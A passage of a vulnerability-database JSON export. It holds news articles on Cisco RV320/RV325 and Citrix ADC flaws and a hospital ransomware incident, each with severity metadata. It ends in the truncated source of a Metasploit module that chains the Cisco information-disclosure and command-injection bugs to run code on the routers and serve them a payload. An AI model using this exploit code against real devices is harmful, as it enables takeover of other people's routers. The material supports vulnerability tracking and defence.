(assigned CVE-2019-1652) and an information disclosure flaw (assigned CVE-2019-1653), a combination of which could allow a remote attacker to take full control of an affected Cisco router. \n \nThe first issue exists in RV320 and RV325 dual gigabit WAN VPN routers running firmware versions 1.4.2.15 through 1.4.2.19, and the second affects firmware versions 1.4.2.15 and 1.4.2.17, according to the [Cisco's advisory](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-inject>). \n \nBoth the vulnerabilities, discovered and responsibly reported to the company by German security firm RedTeam Pentesting, actually resides in the web-based management interface used for the routers and are remotely exploitable. 
\n \n\n\n * CVE-2019-1652\u2014The flaw allows an authenticated, remote attacker with administrative privileges on an affected device to execute arbitrary commands on the system.\n * CVE-2019-1653\u2014This flaw doesn't require any authentication to reach the router's web-based management portal, allowing attackers to retrieve sensitive information including the router's configuration file containing MD5 hashed credentials and diagnostic information.\n \nThe PoC exploit code targeting Cisco RV320/RV325 routers published on the Internet first exploits CVE-2019-1653 to retrieve the configuration file from the router to obtain its hashed credentials and then exploits CVE-2019-1652 to execute arbitrary commands and gain complete control of the affected device. The hash does not need to be cracked: the management interface accepts the MD5 value itself as the password, which is how the Metasploit module for these routers logs in. \n \nResearchers from cybersecurity firm [Bad Packets](<https://badpackets.net/over-9000-cisco-rv320-rv325-routers-vulnerable-to-cve-2019-1653/>) said they found at least 9,657 Cisco routers (6,247 RV320 and 3,410 RV325) worldwide that are vulnerable to the information disclosure vulnerability, most of which are located in the United States. \n \nThe firm shared an [interactive map](<https://docs.google.com/spreadsheets/d/1ZocV8n4DOmcKJ_ugjjQ_gjIAmDHxT1JBhVxIAdABVyY/edit#gid=1297196434>), showing all vulnerable RV320/RV325 Cisco routers in 122 countries and on the networks of 1,619 unique internet service providers. \n \nBad Packets said its honeypots detected opportunistic scanning activity for vulnerable routers from multiple hosts starting Saturday, suggesting the hackers are actively trying to exploit the flaws to take full control of the vulnerable routers. \n \nThe best way to protect yourself from becoming the target of one such attack is to install the latest Cisco RV320 and RV325 [Firmware release 1.4.2.20](<https://software.cisco.com/download/home/284005929/type/282465789/release/1.4.2.20?catid=268437899>) as soon as possible. 
\n \nAdministrators who have not yet applied the firmware update are strongly advised to change their router's admin and WiFi credentials and to treat the device as already compromised.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2019-01-28T11:31:00", "type": "thn", "title": "New Exploit Threatens Over 9,000 Hackable Cisco RV320/RV325 Routers Worldwide", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-1652", "CVE-2019-1653"], "modified": "2019-01-28T11:31:47", "id": "THN:F4C5F017FE55E40DF427E75D001F7D91", "href": "https://thehackernews.com/2019/01/hacking-cisco-routers.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:40:08", "description": 
"[](<https://thehackernews.com/images/-YFnAQDBLWlw/X2h9bFB25hI/AAAAAAAAAyE/jMecIXHH_sMcXYoQN-b9qTiy868SAREGgCLcBGAsYHQ/s728/ransomware-attack-on-hospital.jpg>)\n\n \nGerman authorities last week [disclosed](<https://apnews.com/cf8f8eee1adcec69bcc864f2c4308c94>) that a ransomware attack on the University Hospital of D\u00fcsseldorf (UKD) caused a failure of IT systems, resulting in the death of a woman who had to be sent to another hospital that was 20 miles away.\n\nThe incident marks the first recorded casualty as a consequence of cyberattacks on critical healthcare facilities, which have ramped up in recent months.\n\nThe attack, which exploited a Citrix ADC [CVE-2019-19781](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>) vulnerability to cripple the hospital systems on September 10, is said to have been \"misdirected\" in that it was originally intended for Heinrich Heine University, according to an extortion note left by the perpetrators.\n\nAfter law enforcement contacted the threat actors and informed them that they had encrypted a hospital, the operators behind the attack withdrew the ransom demand and provided the decryption key.\n\nThe case is currently being treated as a homicide, BBC News [reported](<https://www.bbc.com/news/technology-54204356>) over the weekend.\n\n### Unpatched Vulnerabilities Become Gateway to Ransomware Attacks\n\nAlthough several ransomware gangs said early on in the pandemic that they would not deliberately [target hospitals or medical facilities](<https://thehackernews.com/2016/11/hospital-cyber-attack-virus.html>), the recurring attacks [prompted Interpol](<https://thehackernews.com/2020/04/cronavirus-hackers.html>) to issue a warning cautioning hospitals against ransomware attacks designed to lock them out of their critical systems in an attempt to extort payments.\n\nWeak credentials and VPN vulnerabilities have proven to be a boon for threat actors seeking to break into 
the internal networks of businesses and organizations, leading cybersecurity agencies in the U.S. and U.K. to publish [multiple](<https://thehackernews.com/2020/09/iranian-hackers-sanctioned.html>) [advisories](<https://www.ncsc.gov.uk/news/citrix-alert>) about active exploitation of the flaws.\n\n\"The [Federal Office for Information Security] is becoming increasingly aware of incidents in which Citrix systems were compromised before the security updates that were made available in January 2020 were installed,\" the German cybersecurity agency [said](<https://www.bsi.bund.de/DE/Presse/Pressemitteilungen/Presse2020/UKDuesseldorf_170920.html>) in an alert last week.\n\n\"This means that attackers still have access to the system and the networks behind it even after the security gap has been closed. This possibility is currently increasingly being used to carry out attacks on affected organizations.\"\n\nThe development also coincides with a fresh [advisory](<https://www.ncsc.gov.uk/news/alert-targeted-ransomware-attacks-on-uk-education-sector>) from the U.K. 
National Cyber Security Centre (NCSC), which said it has observed an uptick in ransomware incidents targeting educational institutions since at least August 2020, while urging schools and universities to implement a \"defence in depth\" strategy to defend against such malware attacks.\n\nSome of the affected institutions included [Newcastle](<https://www.ncl.ac.uk/itservice/latest-news/>) and [Northumbria](<https://www.bbc.com/news/uk-england-tyne-53989404>) Universities, among others.\n\nCiting Remote Desktop Protocol (RDP), vulnerable software or hardware, and email phishing as the three most common infection vectors, the agency [recommended](<https://blog.emsisoft.com/en/36921/8-critical-steps-to-take-after-a-ransomware-attack-ransomware-response-guide-for-businesses/>) that organizations maintain up-to-date offline backups, adopt endpoint malware protection, secure RDP services using multi-factor authentication, and have an effective patch management strategy in place.\n\n### A Spike in Ransomware Infections\n\nIf anything, the ransomware crisis seems to be only getting worse. [Historical data](<https://sites.temple.edu/care/ci-rw-attacks/>) gathered by Temple University's CARE cybersecurity lab has shown that there have been a total of 687 publicly disclosed cases in the U.S. 
since 2013, with 2019 and 2020 alone accounting for more than half of all reported incidents (440).\n\nGovernment facilities, educational institutions, and healthcare organizations are the most frequently hit sectors, as per the analysis.\n\nAnd if 2020 is any indication, attacks against colleges and universities are showing no signs of slowing down.\n\n[](<https://thehackernews.com/images/-w1AP-pVwnR0/X2h7szFvYJI/AAAAAAAAAx4/R2M_VI5F2gUCV9Dq0WYitww8OQ_Uz2P1gCLcBGAsYHQ/s0/ransomware-malware-attack-on-universities.jpg>)\n\nAllan Liska, a threat intelligence analyst at Recorded Future, revealed there had been at least 80 publicly reported ransomware infections targeting the education sector to date this year, a massive jump from 43 ransomware attacks for the whole of 2019.\n\n\"Part of this change can be attributed to extortion sites, which force more victims to announce attacks,\" Liska said in a [tweet](<https://twitter.com/uuallan/status/1307684719593746432>). \"But, in general, ransomware actors have more interest in going after colleges and universities, and they are often easy targets.\"\n\nYou can read more about NCSC's mitigation measures [here](<https://www.ncsc.gov.uk/guidance/mitigating-malware-and-ransomware-attacks>). For more guidance on proofing businesses against ransomware attacks, head to the US Cybersecurity and Infrastructure Security Agency's response guide [here](<https://us-cert.cisa.gov/security-publications/Ransomware>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-09-21T10:20:00", "type": "thn", "title": "A Patient Dies After Ransomware Attack Paralyzes German Hospital Systems", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-09-21T10:34:14", "id": "THN:EB3F9784BB2A52721953F128D1B3EAEC", "href": "https://thehackernews.com/2020/09/a-patient-dies-after-ransomware-attack.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:38:52", "description": "[](<https://thehackernews.com/images/-C3dSDFvJiqA/XiW3-49gerI/AAAAAAAABUA/ZZoejAM3OJUPzdMEoE_ef-Wyi7-BtaokACLcBGAsYHQ/s728-e100/Citrix-ADC-Gateway-hacking.jpg>)\n\nCitrix has finally started rolling out security patches for a critical [vulnerability in ADC and Gateway](<https://thehackernews.com/2020/01/citrix-adc-gateway-exploit.html>) software that attackers 
started exploiting in the wild earlier this month after the company announced the existence of the issue without releasing any permanent fix. \n \nI wish I could say, \"better late than never,\" but since hackers don't waste time or miss any opportunity to exploit vulnerable systems, even a short window of time resulted in the compromise of hundreds of Internet-exposed Citrix ADC and Gateway systems. \n \nAs explained earlier on The Hacker News, the vulnerability, tracked as **CVE-2019-19781**, is a path traversal issue that could allow unauthenticated remote attackers to execute arbitrary code on several versions of Citrix ADC and Gateway products, as well as on the two older versions of Citrix SD-WAN WANOP. \n \nRated critical with CVSS v3.1 base score 9.8, the issue was discovered by Mikhail Klyuchnikov, a security researcher at Positive Technologies, who responsibly reported it to Citrix in early December. \n \nThe vulnerability has been actively exploited in the wild since last week by dozens of hacking groups and individual attackers\u2014thanks to the public release of multiple [proof-of-concept exploits](<https://thehackernews.com/2020/01/citrix-adc-gateway-exploit.html>). \n \nAccording to cyber security [experts](<https://twitter.com/0xDUDE/status/1218988914272362496?s=08>), as of today, there are over 15,000 publicly accessible vulnerable Citrix ADC and Gateway servers that attackers can exploit overnight to target potential enterprise networks. \n \nFireEye experts found an attack campaign where someone was compromising vulnerable Citrix ADCs to install a previously-unseen payload, dubbed \"[NotRobin](<https://www.fireeye.com/blog/threat-research/2020/01/vigilante-deploying-mitigation-for-citrix-netscaler-vulnerability-while-maintaining-backdoor.html>),\" that scans systems for cryptominers and malware deployed by other potential attackers and removes them to maintain exclusive backdoor access. 
\n \n\n\n> [#Citrix](<https://twitter.com/hashtag/Citrix?src=hash&ref_src=twsrc%5Etfw>) released a free tool that analyzes available log sources and system forensic artifacts to identify whether an ADC appliance has potentially been compromised using CVE-2019-19781 security flaw. \n \nYou can find the tool and instructions here: <https://t.co/eewijzI2l9>[#infosec](<https://twitter.com/hashtag/infosec?src=hash&ref_src=twsrc%5Etfw>) <https://t.co/YKMwgPzmYE>\n> \n> \u2014 The Hacker News (@TheHackersNews) [January 22, 2020](<https://twitter.com/TheHackersNews/status/1219994163581554689?ref_src=twsrc%5Etfw>)\n\n \n \n\"This actor exploits NetScaler devices using CVE-2019-19781 to execute shell commands on the compromised device,\" FireEye said. \n \n\"FireEye believes that the actor behind NOTROBIN has been opportunistically compromising NetScaler devices, possibly to prepare for an upcoming campaign. They remove other known malware, potentially to avoid detection by administrators.\" \n \n\n\n## Citrix Patch Timeline: Stay Tuned for More Software Updates!\n\n \nLast week Citrix [announced a timeline](<https://twitter.com/TheHackersNews/status/1216239812249702401>), promising to release patched firmware updates for all supported versions of ADC and Gateway software before the end of January 2020, as shown in the chart. 
\n\n\n[](<https://thehackernews.com/images/-GFKY1pukwgU/XiWsvTjWRzI/AAAAAAAABT0/6B9St94Mff0LZyZw6yzG2oMefLn6gMgGACLcBGAsYHQ/s728-e100/Citrix-ADC-Gateway.jpg>)\n\nAs part of its [first batch of updates](<https://www.citrix.com/blogs/2020/01/19/vulnerability-update-first-permanent-fixes-available-timeline-accelerated/>), Citrix today released permanent patches for ADC versions 11.1 and 12.0 that also apply to \"ADC and Gateway VPX hosted on ESX, Hyper-V, KVM, XenServer, Azure, AWS, GCP or on a Citrix ADC Service Delivery Appliance (SDX).\" \n \n\"It is necessary to upgrade all Citrix ADC and Citrix Gateway 11.1 instances (MPX or VPX) to build 11.1.63.15 to install the security vulnerability fixes. It is necessary to upgrade all Citrix ADC and Citrix Gateway 12.0 instances (MPX or VPX) to build 12.0.63.13 to install the security vulnerability fixes,\" Citrix said in its advisory. \n \n\"We urge customers to install these fixes immediately,\" the company said. \"If you have not already done so, you need to apply the previously supplied mitigation to ADC versions 12.1, 13, 10.5, and SD-WAN WANOP versions 10.2.6 and 11.0.3 until the fixes for those versions are available.\" \n \nThe company also warned that customers with multiple ADC versions in production must apply the correct version of patch to each system separately. \n \nBesides installing available patches for supported versions and applying the recommended mitigation for unpatched systems, Citrix ADC administrators are also advised to monitor their device logs for attacks. 
\n \n**UPDATE \u2014 **Citrix on Thursday also released a [second batch of permanent security patches](<https://www.citrix.com/blogs/2020/01/23/fixes-now-available-for-citrix-adc-citrix-gateway-versions-12-1-and-13-0/>) for the critical RCE vulnerability affecting ADC and Gateway versions 12.1 and 13.0.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-20T14:24:00", "type": "thn", "title": "Citrix Releases Patches for Critical ADC Vulnerability Under Active Attack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-24T07:05:37", "id": "THN:166AAAF7F04EF01C9E049500387BD1FD", "href": "https://thehackernews.com/2020/01/citrix-adc-patch-update.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:38:53", "description": "[](<https://thehackernews.com/images/-_9-nocA92TI/XhmeU1ZwSqI/AAAAAAAA2KQ/m0YexAlFrVQzvw1H2fYT8uoiFY33g82DQCLcBGAsYHQ/s728-e100/citrix-adc-gateway-vulnerability.jpg>)\n\nIt's now or never to prevent your enterprise servers running vulnerable versions of Citrix application delivery, load balancing, and 
Gateway solutions from getting hacked by remote attackers. \n \nWhy the urgency? Earlier today, multiple groups publicly released weaponized proof-of-concept exploit code [[1](<https://github.com/trustedsec/cve-2019-19781>), [2](<https://github.com/projectzeroindia/CVE-2019-19781>)] for a recently disclosed remote code execution vulnerability in Citrix's NetScaler ADC and Gateway products that could allow anyone to leverage them to take full control over potential enterprise targets. \n \nJust before the Christmas and year-end holidays, Citrix [announced](<https://support.citrix.com/article/CTX267027>) that its Citrix Application Delivery Controller (ADC) and Citrix Gateway are vulnerable to a critical path traversal flaw (CVE-2019-19781) that could allow an unauthenticated attacker to perform arbitrary code execution on vulnerable servers. \n \nCitrix confirmed that the flaw affects all supported versions of the software, including: \n \n\n\n * Citrix ADC and Citrix Gateway version 13.0 all supported builds\n * Citrix ADC and NetScaler Gateway version 12.1 all supported builds\n * Citrix ADC and NetScaler Gateway version 12.0 all supported builds\n * Citrix ADC and NetScaler Gateway version 11.1 all supported builds\n * Citrix NetScaler ADC and NetScaler Gateway version 10.5 all supported builds\n \nThe company made the disclosure without releasing any security patches for the vulnerable software; instead, [Citrix offered mitigation](<https://support.citrix.com/article/CTX267679>) to help administrators guard their servers against potential remote attacks\u2060\u2014and even at the time of writing, there's no patch available almost 23 days after disclosure. 
\n \n\n\n \nThough cyberattacks against vulnerable servers were [first seen in the wild](<https://twitter.com/sans_isc/status/1213228049011007489>) last week, when hackers developed a private exploit after reverse engineering the mitigation information, the public release of weaponized PoC code will now make it easier for low-skilled script kiddies to launch cyberattacks against vulnerable organizations. \n \nAccording to [Shodan](<https://beta.shodan.io/search/facet?query=http.waf%3A%22Citrix+NetScaler%22&facet=org>), at the time of writing, there are over 125,400 publicly accessible Citrix ADC or Gateway servers that could be exploited overnight if not taken offline or protected using the available mitigation. \n \nWhile discussing [technical details](<https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/>) of the flaw in a blog post published yesterday, MDSec also released a video demonstration of the exploit it developed, but chose not to release the exploit itself at this moment. 
\n \nBesides applying the recommended mitigation, Citrix ADC administrators are also advised to monitor their device logs for attacks.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-11T10:21:00", "type": "thn", "title": "PoC Exploits Released for Citrix ADC and Gateway RCE Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-11T10:22:37", "id": "THN:6ED39786EE29904C7E93F7A0E35A39CB", "href": "https://thehackernews.com/2020/01/citrix-adc-gateway-exploit.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:40:15", "description": "[](<https://thehackernews.com/images/-YFgpJhs_wIc/XwV5FgvOBvI/AAAAAAAAAi0/I-4cCa2dIG4SoMiPExrAAoVmPOMt6TE-ACLcBGAsYHQ/s728-e100/citrix-software.jpg>)\n\nCitrix yesterday issued new security patches for as many as [11 security flaws](<https://www.citrix.com/blogs/2020/07/07/citrix-provides-context-on-security-bulletin-ctx276688/>) that affect its Citrix Application Delivery Controller (ADC), Gateway, and SD-WAN WAN Optimization edition (WANOP) networking products. 
\n \nSuccessful exploitation of these critical flaws could let unauthenticated attackers perform code injection, information disclosure, and even denial-of-service attacks against the gateway or the [authentication virtual servers](<https://docs.citrix.com/en-us/netscaler/12/aaa-tm/authentication-virtual-server.html>). \n \nCitrix confirmed that the aforementioned issues do not impact other virtual servers, such as load balancing and content switching virtual servers. \n \nThe affected Citrix SD-WAN WANOP appliances include models 4000-WO, 4100-WO, 5000-WO, and 5100-WO. \n \nThe networking vendor also reiterated that these vulnerabilities were not connected to a previously fixed [zero-day NetScaler flaw](<https://thehackernews.com/2020/01/citrix-adc-patch-update.html>) (tagged as [CVE-2019-19781](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>)) that allowed bad actors to perform [arbitrary code execution](<https://support.citrix.com/article/CTX267027>) even without proper authentication. \n \nIt also said there's no evidence the newly disclosed flaws are being exploited in the wild and that the barriers to exploitation of these flaws are high. \n \n\"Of the 11 vulnerabilities, there are six possible attack routes; five of those have barriers to exploitation,\" Citrix's CISO Fermin Serna said. \"Two of the remaining three possible attacks additionally require some form of existing access. That effectively means an external malicious actor would first need to gain unauthorized access to a vulnerable device to be able to conduct an attack.\" \n \nAlthough Citrix has refrained from publishing technical details of the vulnerabilities, citing malicious actors' efforts to leverage the patches and the information to reverse engineer exploits, attacks on the management interface of the products could result in system compromise by an unauthenticated user, or through Cross-Site Scripting (XSS) on the management interface. 
\n \nAn adversary could also create a download link for a vulnerable device, which could result in the compromise of a local computer upon execution by an unauthenticated user on the management network. \n \nA second class of attacks concerns virtual IPs (VIPs), permitting an attacker to mount a DoS attack against the Gateway or remotely scan the ports of the internal network. \n \n\"Attackers can only discern whether a TLS connection is possible with the port and cannot communicate further with the end devices,\" Citrix noted in its [advisory](<https://support.citrix.com/article/CTX276688>). \n \nIn addition, a separate vulnerability in Citrix Gateway Plug-in for Linux (CVE-2020-8199) would allow a local logged-on user of a Linux system to elevate their privileges to an administrator account on that system. \n \nAccording to a [Positive Technologies](<https://www.ptsecurity.com/ww-en/about/news/citrix-vulnerability-allows-criminals-to-hack-networks-of-80000-companies/>) report last December, the traffic management and secure remote access applications are used by over 80,000 organizations across the world. 
\n \nIt's recommended that administrators download and apply the latest builds for Citrix ADC, Citrix Gateway, and Citrix SD-WAN WANOP appliances as soon as possible to mitigate risk and defend against potential attacks designed to exploit these flaws.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-08T07:43:00", "type": "thn", "title": "Citrix Issues Critical Patches for 11 New Flaws Affecting Multiple Products", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781", "CVE-2020-8199"], "modified": "2020-07-08T07:43:59", "id": "THN:DABC62CDC9B66962217D9A8ABA9DF060", "href": "https://thehackernews.com/2020/07/citrix-software-security-update.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2022-08-16T08:11:44", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2019-04-03T00:00:00", "type": "exploitdb", "title": "Cisco RV320 and RV325 - Unauthenticated Remote Code Execution (Metasploit)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2019-1652", "2019-1653", "CVE-2019-1652", "CVE-2019-1653"], "modified": "2019-04-03T00:00:00", "id": "EDB-ID:46655", "href": "https://www.exploit-db.com/exploits/46655", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::Remote::HttpServer::HTML\r\n include Msf::Exploit::CmdStager\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"Cisco RV320 and RV325 Unauthenticated Remote Code Execution\",\r\n 'Description' => %q{\r\n This exploit module combines an information disclosure (CVE-2019-1653)\r\n and a command injection vulnerability (CVE-2019-1652) together to gain\r\n unauthenticated remote code execution on Cisco RV320 and RV325 small business\r\n routers. Can be exploited via the WAN interface of the router. 
Either via HTTPS\r\n on port 443 or HTTP on port 8007 on some older firmware versions.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' => [\r\n 'RedTeam Pentesting GmbH', # Discovery, Metasploit\r\n 'Philip Huppert', # Discovery\r\n 'Benjamin Grap' # Metasploit\r\n ],\r\n 'References' => [\r\n [ 'CVE','2019-1653' ],\r\n [ 'CVE','2019-1652' ],\r\n [ 'EDB','46243' ],\r\n [ 'BID','106728' ],\r\n [ 'BID','106732' ],\r\n [ 'URL', 'https://www.redteam-pentesting.de/en/advisories/rt-sa-2018-002/-cisco-rv320-unauthenticated-configuration-export' ],\r\n [ 'URL', 'https://www.redteam-pentesting.de/en/advisories/rt-sa-2018-004/-cisco-rv320-command-injection' ]\r\n ],\r\n 'Platform' => 'linux',\r\n 'Targets' =>\r\n [\r\n [ 'LINUX MIPS64',\r\n {\r\n 'Platform' => 'linux',\r\n 'Arch' => ARCH_MIPS64\r\n }\r\n ]\r\n ],\r\n 'Payload' =>\r\n {\r\n 'BadChars' => \"\"\r\n },\r\n 'CmdStagerFlavor' => [ 'bourne' ],\r\n 'Privileged' => true,\r\n 'DisclosureDate' => \"Sep 9 2018\",\r\n 'DefaultTarget' => 0))\r\n\r\n register_options([\r\n Opt::RPORT(8007), # port of Cisco webinterface\r\n OptString.new('URIPATH', [true, 'The path for the stager. Keep set to default! 
(We are limited to 50 chars for the initial command.)', '/']),\r\n OptInt.new('HTTPDELAY', [true, 'Time that the HTTP Server will wait for the payload request', 15]),\r\n OptBool.new('USE_SSL', [false, 'Negotiate SSL/TLS for outgoing connections', false]) # Don't use 'SSL' option to prevent HttpServer from picking this up.\r\n ])\r\n deregister_options('SSL') # prevent SSL in HttpServer and resulting payload requests since the injected wget command will not work with '--no-check-certificate' option.\r\n deregister_options('SSLCert') # not required since stager only uses HTTP.\r\n end\r\n\r\n def execute_command(cmd, opts = {})\r\n # use generated payload, we don't have to do anything here\r\n end\r\n\r\n def autofilter\r\n true\r\n end\r\n\r\n def on_request_uri(cli, req)\r\n print_status(\"#{peer} - Payload request received: #{req.uri}\")\r\n @cmdstager = generate_cmdstager().join(';')\r\n send_response(cli, \"#{@cmdstager}\")\r\n end\r\n\r\n def primer\r\n payload_url = get_uri\r\n print_status(\"Downloading configuration from #{peer}\")\r\n if(datastore['USE_SSL'])\r\n print_status(\"Using SSL connection to router.\")\r\n end\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(\"cgi-bin\",\"config.exp\"),\r\n 'SSL' => datastore['USE_SSL']\r\n })\r\n unless res\r\n vprint_error('Connection failed.')\r\n return nil\r\n end\r\n\r\n unless res.code == 200\r\n vprint_error('Could not download config. 
